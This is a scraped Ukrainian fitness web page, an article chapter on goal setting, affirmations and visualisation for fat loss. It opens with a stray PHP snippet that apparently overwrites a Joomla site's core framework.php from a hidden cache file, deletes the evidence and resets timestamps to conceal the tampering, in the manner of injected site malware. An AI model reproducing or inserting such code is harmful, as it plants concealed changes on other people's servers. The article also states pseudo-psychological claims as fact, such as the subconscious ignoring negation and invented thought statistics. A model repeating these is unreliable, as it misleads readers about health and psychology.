$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Мотивація та цілі (3-16) | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Мотивація та цілі (3-16)

Сторінка 3 з 16
ЗМІСТ

Теорія и практика жироспалювання

"Найгірше, що може бути в житті, це не поразка на шляху до високої мети, а успіх у досягненні низької"

Мікеланджело

"Ми стаємо тим, що про себе думаємо"

Ерл Нейтінгейл

Проста процедура, яку ви зобов'язані виконати перед тим, як ви почнете будь-яку програму тренувань або дієту.

Це найважливіша інформація, хоча вона й не має нічого спільного з калоріями, білками, вуглеводами, жирами, кардіотренуваннями, силовими тренуваннями і ні  чим не пов'язана з харчуванням і спортом. Ви побачите, що це проста, але необхідна річ, яку вам потрібно усвідомити перед тим, як ви піднімете свою першу вагу в спортзалі, почнете свою дієту, і взагалі з'явитеся на порозі фітнес клубу.

Якщо ви успішно впораєтеся з цим, дієта і тренування будуть легкими, і струнке тіло незабаром додасться. Але якщо ви проігноруєте даний пункт, як роблять багато людей, вам судилося зазнати поразки незалежно від того, як старанно ви будете старатися.

Я зараз говорю про встановлення цілей.

Деякі люди мають в голові якусь абстрактну мету, але більшість з вас ніколи не визначало свої бажання та мрії в письмовому вигляді.

Деякі люди проводять більше часу, плануючи новорічну вечірку, ніж своє власне життя. Тільки 3% людей роблять спроби скласти і зафіксувати в письмовому вигляді свої цілі та плани.

Якщо цілі ретельно визначені і посаджені глибоко в підсвідомість, то вони породжують дію. Цілі створюють мотивацію і наповнюють вас енергією. Цілі витягують вас рано вранці з ліжка й тягнуть вас у спортзал. Для того, щоб завжди мати високий психічний тонус, необхідно мати заряджені енергією цілі, які будуть оформлені в письмовому вигляді. Вони будуть служити паливом у вашому двигуні, який буде штовхати вас вперед.

Ви вважаєте, що повністю відповідаєте за свої вчинки та поведінку, але насправді за ваші вчинки відповідає підсвідомість. Саме вона контролює вашу поведінку. Якщо ви знаєте, що вам потрібно робити, але не уявляєте себі, що робить це, то ви, мабуть, посилаєте своєму підсвідомості негативні й суперечливі сигнали. Поведінка, яка породжується підсвідомістю, відома нам як звички. На щастя, ви можете перепрограмувати свою підсвідомість за допомогою позитивних команд і придбати корисні звички так само легко, як ви стаєте жертвою шкідливих. Все починається з того, що ви сядете і, використовуючи свою свідомість, складете цілі в письмовому вигляді.

Сила думки

Допомагаючи людям з їх тренуваннями і харчуванням, я прийшов до твердого переконання, що найважливішою умовою досягнення та перебування в прекрасній фізичній формі є установка своєї підсвідомості таким чином, щоб воно допомагало вам досягти цього. Ви отримаєте хорошу фігуру тільки тоді, коли встановите собі таку мету, а також будете думати про це протягом усього дня. Я знаю, що зараз говорю речі, які можуть здатися вам дивними, але залишіться зі мною ще на хвилинку, і я все поясню. Я не хочу сказати, щоб ви нічого не робили, а тільки думали, що ви "стрункі". Ніяка кількість позитивних думок не зроблять вас стрункіше без реальних дій. Очевидно, що вам доведеться їсти правильну їжу і займатися тренуваннями.

Я хочу сказати, що якщо ви не направите свою уявну енергію правильним чином, то ваша дієта і вправи не будуть працювати, навіть якщо будуть найкращими на світі. Ви ніколи не задавалися питанням, чому ви іноді провалюєтесь, і ваша сила волі дає тріщину? Або чому в деякі дні ви просто не можете затягнути себе в спортзал? Або чому ви повністю кидаєте свою програму після певного проміжку часу? Або чому ви іноді не можете сказати "ні" шоколадному печиву?

Вся причина в тому, що ви програмуєте свою підсвідомість негативними думками, яке, у свою чергу, керує вашими вчинками. Як ваш "уявний комп'ютер" запрограмований на успіх або поразку?

Наше мислення складається з двох компонентів. Свідомість і підсвідомість.

Свідомість є раціональним, логічним, аналітичним, думаючим компонентом нашого мислення. Свідомість постійно отримує інформацію за допомогою 5 почуттів. Потім воно оцінює їх, аналізує і приходить до висновку, чи отримана інформація є правдою чи брехнею.

Підсвідомість - це частина мислення, яке відповідальне за пам'ять і зберігання інформації для машинально здійснення тих або інших вчинків (звичок), воно відповідає за рефлекси, а також автономні процеси, що відбуваються в тілі.

Важливо зрозуміти, що на відміну від свідомості, підсвідомість "не думає". Воно повністю є підлеглим, що означає, що воно працює як комп'ютер за заданим алгоритмом. Вся інформація, записана і збережена на вашому "комп'ютері", приймається і розцінюється, як правда. І не має значення, чи є ця інформація правдою або брехнею насправді. Підсвідомість неухильно сприймає  все, що до неї доходить. Далі, воно приводить в життя ту програму, яка була задана. Якщо ви постійно повторюєте, що ви "не зможете схуднути", то ваша підсвідомість буде підкорятися і вести вас до цієї мети.

Те, про що ви думаєте кожен день, в підсумку буде прийнято вашим підсвідомістю, і підсвідомість, у свою чергу, буде включати режим автоматичного пілотування ваших вчинків. У цьому й полягає базовий момент у тому, щоб постійно думати позитивно.

Сила зосередження

У силу характеру роботи підсвідомості, надзвичайно важливо концентруватися на всіх ваших цілях, які ви хочете досягти або речей, які ви хочете уникнути.

Ви завжди думаєте про що-небудь або не думаєте про це, але це не означає, що ви не думаєте взагалі. І ви завжди рухаєтеся до тієї мети, про яку думаєте найчастіше, незалежно, правильна це мета чи ні.

Ось кілька прикладів негативних заяв і питань, що завдають вам поразки. Ці фрази, можливо, ви повторюєте собі кожен день, не замислюючись над їх справжнім значенням, і про те, що вони за собою тягнуть.

Я не можу схуднути, що б я не робив
Чому я ніяк не можу втратити ці останні 5 кг?
Чому мені так важко схуднути?
У мене повільний метаболізм
Чому всі можуть схуднути, а я ні ... це несправедливо.
Я не винен (а), це все моя погана спадковість.
Я не хочу більше бути товстим (ою)
Я хотів (ла) би позбутися від цього бридкого товстого живота.
Це ніколи на мене не подіє, тому що я дуже люблю їжу.
У мене немає сили волі для того, щоб змінитися і стати струнким (ою)
Я б зайнявся фізичними вправами, але у мене немає часу.
Я не можу прокидатися так рано для того, щоб займатися тренуваннями.
Я ненавиджу бути товстим (ою)
Я ніколи не побачу свій прес
Я терпіти не можу бігати і потіти
Я не можу
Я спробую
Я хочу схуднути

Протягом усього дня ви ведете внутрішній діалог із самим собою. Психологи називають цифру в 60 000 думок за день. І 98% цих думок повторюються день у день. І більшість з них негативні, 22 мільйони негативних думок у рік! Якщо яскраві вивіски і виблискуючі реклами, які ви бачите в центрі міста, привертають вас зробити ту або іншу покупку, уявіть, як ваші власні думки в голові, від яких вам нікуди втекти, будуть діяти на вашу поведінку! Тому необхідно встановити чіткий контроль над своїм мисленням діалогом і наповнити ці думки позитивними цілями.

Першим кроком буде просто усвідомлення того, про що ви думаєте. Переконайтеся, що знаєте, що відбувається зараз у вашій голові. Як тільки ви помітите негативну думку, ви повинні відразу сказати собі: "СТОП!" і замінити її позитивною. Заміняти "я постараюся" на "я зроблю", замість "мені слід це зробити" скажіть "я зобов'язаний це зробити". Повністю викорінювати таку фразу, як "Я не можу ...". Незабаром ви почнете помічати, що ваш мозок змінив свою полярність, і негативних думок стало набагато менше.

Ось деякі приклади, що ви будете робити замінювати негативні думки, розмовляючи з самим собою.

Як би мені втратити жир і насолоджуватися цим процесом?
Що б мені сьогодні такого зробити, щоб наблизитися до своєї мети?
Що я можу їсти прямо зараз для того, щоб втратити жир?
Як класно я буду себе почувати після сьогоднішнього тренування.
Мій метаболізм прискорюється кожен день
З кожним днем я стаю стрункіше і стрункішою.
Мені подобається, як я виглядаю
Я відповідальний на 100% за свої результати
Чого б мені це не коштувало, я зроблю це!
Я обожнюю здорову їжу
Я обожнюю займатися спортом
Ранкові тренування дають мені бадьорість на весь день!
У мене є час на те, чим я хочу займатися
Я себе люблю
Я можу це зробити
Я зроблю це!
Найпотужніша формула для встановлення цілей у світі.

На початку цієї статті я обіцяв показати вам саму потужну формулу в світі для встановлення цілей. Тепер, коли ви отримали уявлення про те, що таке підсвідомість і чому установка цілей так важлива, ви готові до вивчення формули, яка складається з 12 етапів.

1. Встановлюйте конкретні цілі

Будьте конкретними. Скільки кілограм ви хочете втратити? До якої дати? Скільки жиру ви хочете втратити? Скільки ви хочете важити? Які обсяги ви хочете мати? Який розмір одягу ви хочете носити?

2. Встановлюйте цілі, які можна виміряти

Ваги - корисний предмет, але він ніколи не дасть вам 100% відображення реальності, яке вам потрібно. Вам необхідно знати не те, скільки ви важите, а те, скільки жиру міститься у вашому тілі. Способи визначення жиру бувають різні. Найкращим, вважається сканування тіла в центрах тестування жиру, але звичайні ваги-аназізатори жиру також добре підійдуть для цих цілей.

3. Ставте високі цілі

Реалісти не досягають високих цілей. Багато людей так бояться високих цілей, що просять про те, що вони можуть, а не про те, що вони дійсно хочуть. Це помилка, тому що скромна "реальна" мета не мотивує вас. Бажання! Ось те, що вас мотивує.

Якщо ваша мета лякає вас небагато, то це нормально. Фактично, якщо мета не лякає вас і не розбурхує вам кров, то значить, що мета дуже низька. Думки про великих цілях, які ви ніколи не досягали раніше завжди змушують вас почувати себе трохи злякано і некомфортно.

Подумайте над тим, щоб під'їхати на вечірку в лімузині, вийти під руку з шикарною жінкою (красенем чоловіком) і зайти гордою ходою до будівлі, пройшовши повз натовпу знайомих людей. Або роздягшись на пляжі, побачити, що всі на вас дивляться заздрісними очима і перешіптуються, показуючи на вас пальцями крадькома.

Безумовно, існують деякі генетичні обмеження, які вплинуть на ваші результати, але більшість людей ніколи не наближалися до межі цих можливостей тільки з тієї причини, що вони не вірять у можливість цього. Тому, вони навіть не намагаються. Не питайте, "чи зможу я цього досягти?, Тремтячи як кролик перед удавом", запитуйте "як мені цього досягти?!". Запитайте себе, чи готові ви заплатити ціну, відповідну своєї мети, але не запитуйте, "чи можливо добитися цієї мети в принципі?". Ви можете досягти практично всього, що захочете, якщо ви готові заплатити за це сповна.

4. Встановлюйте конкретні, але розумні терміни

"Втратити 15 кг за 30 днів !!!"," Втратити 5 кг за цей тиждень !!!".

Такими багатообіцяючими гаслами рясніють, як правило, реклами препаратів для схуднення. Але чи реально це? Чи справді можна скинути вагу так швидко?

ТАК!, Цілком реально схуднути на 15 кг за місяць. Однак, роблячи це, ви здійснюєте помилку, плутаючи втрату ваги і втрату жиру.

Ваше тіло складається на 70% з води, тому втрачати вагу за рахунок води дуже легко. Будь-яка традиційна дієта зневоднює ваш організм, даючи швидкий і помітний ефект. Якщо ви хочете втратити 5 кг за тиждень, просто перестаньте пити воду.

Вашою метою повинна бути втрата жиру, а не ваги.

Яка ж швидкість втрати жиру? Американський Інститут Спортивній Медицини, який є найбільшою й авторитетною організацією в області спорту і медицини, встановив середню безпечну втрату жиру в 0,5-1 кг на тиждень. Це становить приблизно 0,5% жиру в тиждень від маси тіла.

Можливо втратити більше, ніж 1 кг на тиждень, але якщо ви це робите, все, що більше 1 кг, швидше за все, будуть м'язи і вода.

Не бійтеся ставити високі цілі, але встановлюйте реальні терміни, необхідні для їх досягнення. Будьте терплячі. Існують певні рамки безпеки для безпечної втрати жиру.

5. Встановлюйте короткострокові і довгострокові цілі

Як тільки ви почали думати над тим, що ви конкретно хочете, не пишіть лише одну мету, складіть цілий список. Список ваших цілей повинен включати довгострокові і короткострокові цілі. Ось 6 таких цілей.

Ваш основний довгостроковий план
План на 12 місяців вперед
План на 3 місяці вперед
План на тиждень вперед (Таблиця складу тіла і зважування)
План на день (Речі для постійного повторення, для розвитку звичок)
Кожен день має значення

Для початку встановіть довгострокову мету і фінальний результат. Про яке тіло ви мрієте? Дозвольте ваші уяві перетнути самі дикі і сміливі кордону. Не слухайте нікого, хто скаже, що це неможливо! Не зважайте на людей, від яких виходить негатив, що обривають ваші починання. Якщо ви дійсно хочете цього всієї своєю душею і готові працювати для цього, не зупиняйтесь! - Ідіть вперед. Далі, встановіть мету на рік вперед. Визначення завдань на рік вперед - дуже важливо, особливо якщо у вас попереду багато роботи над своїм тілом. Наприклад, якщо вам необхідно скинути 50 кг, то на це буде потрібно щонайменше півтора року. Не чекайте і навіть не намагайтеся здійснити це завдання швидше.

Швидше за все, найважливішим завданням є установка цілей на 3 місяці вперед. Три місяці - прекрасний термін для короткострокових завдань, тому що за 3 місяці можна багато що змінити. Багато людей можуть повністю змінити своє тіло за 90 днів. За 3 місяці реально втратити близько 6% жиру тіла, від 6 до 12 кг жиру.

Встановлення 3-х місячної цілі дуже важлива, тому що якщо ви встановлюєте довгострокову мету, то вам не потрібно поспішати. Якщо у вас є тільки річна мета, то ви швидше за все будете зволікати, тому що це наступить ще дуже й дуже нескоро, тому немає сенсу поспішати. Коли ж "термін здачі результатів" прямо перед вами, ви будете розуміти, що кожний прийом їжі і кожне тренування мають значення.

Ви повинні стати для себе тренером і дієтологом. Ні тато, ні мама, ні дружина, ні подруга, ні тренер, а ви, ви і тільки ви.

Вам також потрібні тижневі цілі, які нагадують, що ви перебуваєте на шляху до більшої мети. Такі цілі є короткостроковій зведенням результатів, що дають вам негайне уявлення про те, йдете ви в правильному напрямку, чи ні.

Звіти, необхідні протягом тижня ...

Загальні результати зважувань за тиждень
Фотографії
Вимірювання обсягів тіла
Защипи шкірної складки.
Якщо ви фіксуєте позитивні результати, то все в порядку, не міняйте нічого і продовжуйте діяти. Якщо ж результати вас не задовольняють, то ви повинні негайно вжити заходів і скорегувати курс.

Для досягнення тижневих, тримісячних, 12-місячних та фінальних цілей, ви повинні виробити відповідні щоденні звички. Ви повинні виробляти ці звички кожен день протягом усього дня постійно до тих пір, поки вони не стануть такими ж невід'ємними звичками, як чищення зубів або ранковий душ. Створіть список щоденних цілей, які необхідно виконувати і звички, які необхідно виробити.

Наприклад:

Їм маленькі порції їжі протягом всього дня
Скорочувати к-сть споживаного цукру
Прокидатися рано вранці
Лягати спати не пізніше 23.30
Готувати їжу на наступний день
Планувати продукти, які вам необхідно купити, щоб бути підготовленим до наступного тижня.

Основні довгострокові цілі не працюють без короткочасних цілей, великі цілі і складаються їх маленьких цілей. Іншими словами, завтрашній день починає формуватися сьогодні, а великий будинок починається з першої цеглини.

Наступного разу, якщо у вас настане спокуса з'їсти шкідливу їжу, пропустити заняття або просто навалиться небажання щось робити через маленький результат, сконцентруйтеся на сьогоднішній меті, а не на майбутніх 40 тренуваннях. Скажіть собі: "Все, що в мене є - це сьогоднішній день", "Мені потрібно зробити ще один рух, ще раз підтягнутися, ще один раз підняти гантелю, ... цей прийом їжі, ця тренування, ці 30 хвилин бігу, плавання ... і т.д. "," Якщо я зроблю те, що повинен зробити зараз, то в підсумку я доб'юся своєї основної мети ".

Остання мета, яку вам необхідно встановити - це образ думок.

Якщо ви будете постійно порівнювати себе з кимось, то це гарантує вам постійне незадоволення і нещастя, незалежно від того, що вам потрібно досягти. Це називається "закон контрасту". Завжди буде хтось сильніший, стрункіше, швидше, з більш обдарованої генетикою, з більш красивим від природи тілом, ніж Ви. Тому порівнюйте себе з самим собою, а не з іншими.

Поставте собі за мету бути краще, ніж ви є зараз, а не бути краще, ніж хтось інший. Постійно змагайтеся з самим собою. Продовжуйте прагнення перевершити свої власні досягнення. Відвідування спортзалу може бути радісним і хвилюючим, якщо ви завжди йдете з думкою, що ви будете покращувати своє тіло. Зробіть це грою. Постарайтеся зробити ще одне повторення, підніміть більш важка вага, протримаєтеся на дистанції на кілька хвилин довше, пропливаючи на одну доріжку більше, пробігу на 2 секунди швидше.

7. Визначте емоційні причини, чому ви хочете досягти ваших цілей

Іноді настають такі дні, коли ви не хочете йти в зал і їсти корисну їжу. Секрет невичерпної мотивації полягає в тому, щоб не лише мати цілі, а й знати "для чого ви робите цього" і "чому ви хочете досягти цієї мети".

Ніцше сказав: "Якщо у вас є тверде навіщо, то ви подолаєте будь-як".

Визначення причини, чому ви хочете досягти тієї чи іншої мети додає мотивації до Ваших дій.

Іноді люди хочуть щось комусь довести. Для деяких хороша фігура необхідна для весілля або відпустки. Деякі просто хочуть користуватися популярністю у протилежної статі. Для деяких це питання життя і смерті, і якщо вони не підуть вказівками лікаря і не скинуть 25 кг за наступні 6 місяців, то можуть померти.

Після того, як ви встановили ваші цілі, вказавши конкретну вагу, відсоток жиру, і т.д., перепишіть ці цілі, вклавши в них стільки емоцій, наскільки здатні. Зокрема, дайте відповідь на два питання:

1. Що важливо для мене в досягненні цілей?

2. Чому це важливо для мене?

Ось додаткові питання, які ви повинні задати собі для того, щоб створити уявний поштовх:

На кого я хочу бути схожим?
Чиє тіло є для мене ідеалом?
Чи хочу виглядати як суперзірка, фотомодель, чи фітнес модель?
Чи хочу справити на когось враження?
Що я хочу довести?
Чи хочу виграти змагання або отримати нагороду?
Чи хочу відчувати себе більш впевнено?
Чи хочу виглядати бездоганно в будь-якому костюмі?
Чи хочу виглядати шикарно для якої-небудь події?
Чи хочу виглядати надзвичайно на пляжі?
Чи хочу привертати увагу оточуючих людей?
Відповіді на дані питання допоможуть вам зарядитися додатковою енергією для досягнення ваших цілей.

8. Переконайтеся, що ваші цілі не суперечать один одному. Зосередьтеся на одній, самі важливі меті


Одним із самих основних перешкод, які блокують досягнення тієї чи іншої мети - суперечливі завдання.

Наприклад, набрати м'язи і спалити жир одночасно.

Можливо втратити велику кількість жиру і набрати невелике кількість м'язів одночасно. Також можливо набрати багато м'язів і спалити трохи жиру. Але те, чого ви ніколи не побачите - це великий набір м'язів і велика втрата жиру одночасно. Просто неможливо з тієї причини, що набір м'язової маси відбувається в умовах надлишку калорій, а втрата жиру в умовах нестачі калорій.

Отже, програми для досягнень цих цілей будуть істотно відрізнятися. Звичайно, після певного терміну можна побачити картину загального зниження жиру і загального набору м'язової маси, але це результат чергування калорій, коли в один день ви споживаєте стільки калорій, скільки вам необхідно для підтримки ваги тіла і запобігання втрати м'язів або навіть їх набору, а в наступні 2-3 дні ви знижуєте калорійність, запускаючи процес спалювання жиру. Але ви повинні зрозуміти, що ці процеси не відбуваються одночасно.

Існують небезпечні для організму хімічні препарати, які дають швидке зниження рівня жиру і швидкий набір м'язової маси. Але я б не радив вам з ними зв'язуватися, якщо ваші цілі - здоров'я і стабільність.

Спочатку зженіть весь зайвий жир, а вже потім оцініть ваше тіло, і вирішіть, де необхідно набрати м'язів.

9. Напишіть ваші цілі у вигляді заяв


Наступним кроком буде запис ваших цілей на картках або папері у вигляді заяв, які ми назвемо "твердження".

1. Ваші твердження повинні бути особистісно-орієнтовані (на себе звичайно). Використовуйте слово: "Я". Краще всього використовувати комбінацію "Я повинен", "Мені потрібно". Ваше підсвідомість відповідає тільки в тому випадку, якщо ви даєте йому пряму команду в персональному вигляді. Все, що вимовляється зі словом "Я повинен" має реальну силу.

Найкраще змішати це твердження з приємною фразою:

"Я щасливий і вдячний від того, що я повинен ______________ (мета)".

2. Далі, ваші твердження повинні бути написані в теперішньому часі, не в майбутньому і без знаку питання.

Підсвідомість може виконувати тільки ті команди, які даються в реальному часі. Також воно не розуміє питального речення.

Підсвідомість дуже схоже на дитину. Якщо ви скажете дитині усього один раз, щоб він (вона) прибирав (а) в своїй кімнаті кожен день в строго певний час, то що вийде? Нічого ... дитина швидше за все не буде цього робити, поки ви не будете давати йому таку команду кожен раз. З часом у нього виробиться звичка, і він (вона) буде це робити сам, але до того часу, він (вона) вже, можливо, не буде дитиною.

Думайте над метою не в майбутньому часі, а як ніби ви вже її досягли.

3. Напишіть мету в позитивному вигляді.

Ваше підсвідомість буде рухати вас до мети незалежно від того, правильна мета чи ні. Тому напишіть тільки те, що вам потрібно. Не пишіть того, чого ви б не хотіли або те, що ви не будете робити. Підсвідомість не зможе відрізнити негативну команду від позитивної. "Я не буду їсти солодке" сприймається підсвідомістю, як "я буду їсти солодке", а команда "я не буду пропускати тренування" розуміється як "я буду пропускати тренування". Підсвідомість не сприймає частку "НЕ", тому що орієнтується на конкретні образи, а не на їх відсутність. Після того, як я став заміняти "я не буду їсти солодке" фразою "я буду їсти корисне", то проблема просто розчинилася. Спробуйте і ви самі переконаєтеся. Це дуже важливий пункт.

10. Читайте ваші записи як мінімум 2 рази на день і завжди тримайте їх перед очима, а також в голові

Психологи довели, що для того, щоб проникнути в підсвідомість і запрограмувати його, необхідні повторення. Більше 500 найбільших світових компаній витрачають мільйони доларів для реклами, грунтуючись на даному відкритті психологів!

Як ви думаєте, чи є простим збігом той факт, що люди частіше купують "Пепсі", ніж інший напій, палять "Мальборо", а не інші менш відомі сигарети. Ви думаєте, що це простий збіг? Ні! Це все тільки тому, що повторюється кожен день одна й та ж реклама проникає вам у підсвідомість і змушувати вас купувати той або інший товар, змушуючи вас думати, що ви робите це абсолютно з доброї волі.

Ви теж можете використовувати силу повторень і впливати на власну підсвідомість і надихнути себе на вчинки. Як тільки ви напишіть твердження, не ховайте їх у ящик столу. Тримайте їх перед собою і читайте як мінімум 2 рази на день. Один раз ранком, другий раз перед сном.

Навіть якщо відразу це не спричинить ніякого видимого ефекту, і вам буде здаватися, що ви займаєтеся дурістю, не кидайте цю справу. Якщо ви хочете підсилити ефект від переконань, не тільки читайте, а переписуйте від руки кожен день свої цілі.

Наклейте одну картку на дзеркало, одну на холодильник, одну вкладіть до книги, і використовуйте замість закладки, і перед тим, як відкрити книгу, яку ви читаєте кожен день, прочитайте те, що написано на цій закладці.

Зробіть запис у щоденнику, а ще краще починайте кожен запис зі своїх цілей. Наклейте стікер перед носом у туалеті, ще один на ваш комп'ютер. Встановіть шпалери на робочому столі у вигляді ваших цілей, а ще краще наситьте їх картинками за відповідною тематикою. Заходьте при можливості в спортивний магазин і гуляйте по ньому 10-15 хвилин навіть якщо нічого не купуєте. Дивіться спортивні передачі, канали спорту, і т.д. Сходіть на фотосесію, де роблять фотографії моделей, поспілкуйтеся з ними.

Не думайте, що ця витрата часу. Подібним чином ви вбирає в себе нові звички, формуєте модель поведінки таким чином, що вона вас самого (саму) зробить моделлю.

Переконання мають величезну силу, яку багато хто з вас в даний момент недооцінюють. Але переконання не будуть працювати, якщо ви виголосить їх один раз або два. Навіть якщо це всього кілька днів, то результат буде невеликий. Також вони не будуть працювати, якщо після декількох тижнів старань ви відкинете папір і перо зі злістю і Закричіть: "Це марення!". Негативна команда відразу зітре всі ваші спроби, звівши їх до нуля.

Вони будуть працювати тільки в тому випадку, якщо ви будете продовжувати повторювати їх кожен день по кілька разів на день, з переконанням, вкладаючи емоції і вірячи знову і знову, повністю замінюючи ними старі, негативні емоції, міцно впилася в ваша підсвідомість.

В один прекрасний день ви здивуєтеся, що робите все, що писали раніше так природно, наче ви це робили все життя.

11. Читайте ваші цілі та завдання з вірою

Що таке віра? Інше визначення віри - це непохитне переконання.

Віра - це коли ви дивитеся в дзеркало, не бачачи поки ніяких змін, але знаєте, що вони будуть, будуть обов'язково. Протилежність вірі - сумнів.

Ви думаєте, що всі моделі, яких ви бачите на обкладинках журналів, боги, яким дано мати таке тіло, а вам немає? Ви помиляєтеся, більшість з них у молодості нічим не відрізнялися від вас у минулому. Просто вони робили те, чого не робили ви, і ось результат.

12. Під час читання переконань мислення візуалізуйте їх так, як ніби ви вже їх досягли


Візуалізація - це уявне зображення картинки або образу. Також візуалізація - це мислення без слів. Коли ви думаєте про гори, то ви навряд чи уявляєте собі гору у вигляді слова: "Г-О-Р-А". Якщо ви звичайна нормальна людина, то швидше за все при слові "гора" у вас у голові виникає зображення цієї самої гори, покритої лісами, наприклад. Якщо я попрошу подумати вас про вашу машині, то ви відразу представите зображення свого автомобіля в голові.

Оскільки ваш мозок думає образами, то додавання яскравого, соковитого, живого, що рухається конкретного образу, до якого ви прагнете, дуже добре допоможе переконати в цьому підсвідомість більш швидко і більш твердо, ніж просто читання тих чи інших переконань на папері.

Ви думаєте, що у вас 30 кг зайвої ваги - це спадковість, народження дитини, збіг, злий рок? Ні, це робота вашого підсвідомості, яка зробила вас таким, які ви є. Підсвідомість, у свою чергу, було запрограмоване установками ззовні. Якщо б вам з раннього дитинства і до сьогоднішнього моменту переконували, що ви повинні їсти тільки корисну їжу і займатися спортом, то ви б мали проблеми із зайвою вагою?

Ви ж чудово розумієте, що шкідлива їжа шкідлива, то тоді чому до цих пір її їсте і не можете нічого з собою вдіяти? Не задавалися питанням, чому сили усвідомлення шкоди не вистачає, щоб перестати робити те, що прилипло до вас мертвою хваткою бульдога? .. вся причина в тому, що жодне наукове пояснення шкоди того або іншого продукту не дістане так швидко підсвідомість, як це роблять яскраві реклами. Образи та асоціації - це мова мозку, для розмови з яким рекламники прекрасно нею володіють.

Подібні вчинки неможливо пояснити з точки зору здорового глузду і логіки з тієї простої причини, що ми забуваємо, що свідомість прямо не контролює наші вчинки, воно має спочатку переконати підсвідомість в тому, що це потрібно робити. А переконати підсвідомість не складе труднощів. Якщо це не зробите ви, це зроблять виробники "пельменів", "пива", "цигарок", "горілки", "БАДів". І ваша підсвідомість прийме цю установку, ні задавши жодного питання з тієї простої причини, що підсвідомість не може думати, він існує для того, щоб виконувати накази.

Дивлячись рекламу майонезу ви ніколи не побачите депресивну товсту тітку, яка з огидою дивиться на свій живіт, задихається, піднімаючись по сходах, сидить на самоті на кухні, соромиться вийти на пляж і ридає в подушку ночами, тому що нікому не потрібна. Ви завжди побачите зелену галявину, щасливих дітей, тварин, фрукти, овочі, яскраві кольори, веселу щасливу компанію друзів, які зібралися тільки заради того, щоб прекрасна, атлетично складена дівчина подала їм прекрасне блюдо, полите "легким майонезом", "легким маслом" і "повітряним соусом". Всі дивляться на цю жінку як на богиню любові. Саме цей яскравий образ змушує ваша підсвідомість змусити вас купувати і є цей майонез, тому що вам сподобалася ця реклама, хоча ви це і не усвідомили, коли в магазині потягнули руку саме до того продукту, рекламу якого ви бачили напередодні.

Куди вам хочеться записатися? У елітний дорогий блискучий, новий фітнес-клуб або в спітнілу гойдалку в підвалі? Перш, ніж віддавати 2000 гр за членський квиток, зрозумійте, що спітніла качалка не така вже й спітніла, а все, що вам потрібно для занять спортом, можна купити за 1000 гр в найближчому магазині спортивних товарів.

Використовуйте образи для досягнення тих цілей, які Ви хочете досягти, а не тих, які хочуть досягти інші за допомогою вас і ваших грошей, нахабним чином експлуатуючи ваша підсвідомість, як довірливого дитини.

Як же пов'язана робота підсвідомості з втратою жиру?

Безпосередньо! Не забувайте, що підсвідомість керує вашими автоматичними діями, які більш відомі як звички. Представляючи себе вже схудлим або як займаються фітнесом, ви даєте своєму підсвідомості інструкцію, що автоматично спричинить дію. Вам буде легше йти в спортклуб, ви не будете відчувати провалів в силі волі, вас не будуть спокушати шкідливі продукти, ви взагалі відчуєте себе вільним господарем своєї долі. Якщо раніше одна думка про спортклубі вас гнітила, то тепер ви будете чекати з нетерпінням, коли закінчиться робочий день, і ви зможете туди піти.

Скажіть, чому в п'ятницю під кінець робочого дня ви почуваєте бадьорість і гарний настрій в той час, як у понеділок, коли по ідеї ви повинні бути відпочивши та бадьорими, ви ледве тягніть ноги вранці в офіс? Навпаки, ви повинні вмирати в п'ятницю ввечері, тому що за 5 днів ви повинні втомитися ...

Сподіваюся, я досить переконав вас у тому, що робота підсвідомості не просто існує, а ще й у тому, що його робота прямо пов'язана з тим, що ви робите і як ви це робите.

Ось приклад цілей-установок, які допоможуть підвищити моральний дух "вашої маленької армії".

Я така щаслива і вдячна, що в мені всього 13% жиру!
Я втрачаю жир і досягаю своєї мети в 14% жиру до 1 червня.

Я просто щаслива, що це відбувається зі мною!
Ці джинси стрейчі так класно облягають мої стегна до початку листопада, я так витончено в них дивишся і червонію, коли чоловіки обертаються і не можуть відірвати очей, проходячи повз мене.
Моя історія у відомому журналі про фітнес. Вона називається "від пампушки до фотомоделі". Мої друзі не можуть повірити, що це я на фотографіях, а мої знайомі обірвали телефон. Мені дзвонить фітнес-фотограф і призначає на наступному тижні зйомки для іншого журналу. Я не можу піти, тому що в мене розклад вже забито до відмови.
Це купальник чудово обтягує мою фігуру, і чоловіки на пляжі просто не можуть відвести від мене погляд. Їх жінки дивляться на мене з заздрістю, загортаючи свої бичка у рушник. До мене підходить гарний молодий чоловік і запрошує ввечері повечеряти під відкритим небом неподалік від пляжу. (Не думайте, що це дурні мрії, тому що чоловіки саме до таких жінок і підходять)
Я виношу величезний вузол старого одягу, що спадає з мене і викидаю все разом узяте. Я йду в дорогий магазин в центрі міста і повністю оновлюю гардероб. Коли я приходжу в гості до своїх знайомих, то мене з першого разу поки ніхто не впізнав, навіть собака.
Я обожнюю вставати рано вранці, робити пробіжку на свіжому повітрі і з'їдати свіжий апетитний сніданок, після чого я йду в гарячий душ, і відчуваю себе чудово протягом усього дня.
Я їм 5 разів на день правильну їжу через кожні 3 години, і це дає мені заряд сил, бадьорості і спалює жир кожен день.
Я випиваю 2-3 літри свіжої прохолодної чистої води, що дає моєму тілу відновлюватися і бути завжди готовим до занять.
Я так обожнюю сидіти у цій гарячій сауні, коли на вулиці мороз. Я люблю роздягатися у сауні, тому що все і завжди дивляться на мене з подивом і перешіптуються, коли я виходжу із сауни.
Я постійно вдосконалюю своє тіло і взяв від своїх природних здібностей максимум.
Я горда і вдячна за те, як я сьогодні виглядаю.
Я гідна того, щоб їсти корисну їжу і виглядати підтягнутою.
Фітнес та здорове харчування - це розкіш, яку я можу собі дозволити.
Я обожнюю запах спортивних магазинів, обирати нову спортивний одяг і базікати з привітними продавцями.
Кожен раз, коли ви досягаєте своєї мети, ви повинні робити 3 речі:

1. Святкувати і заохочувати себе

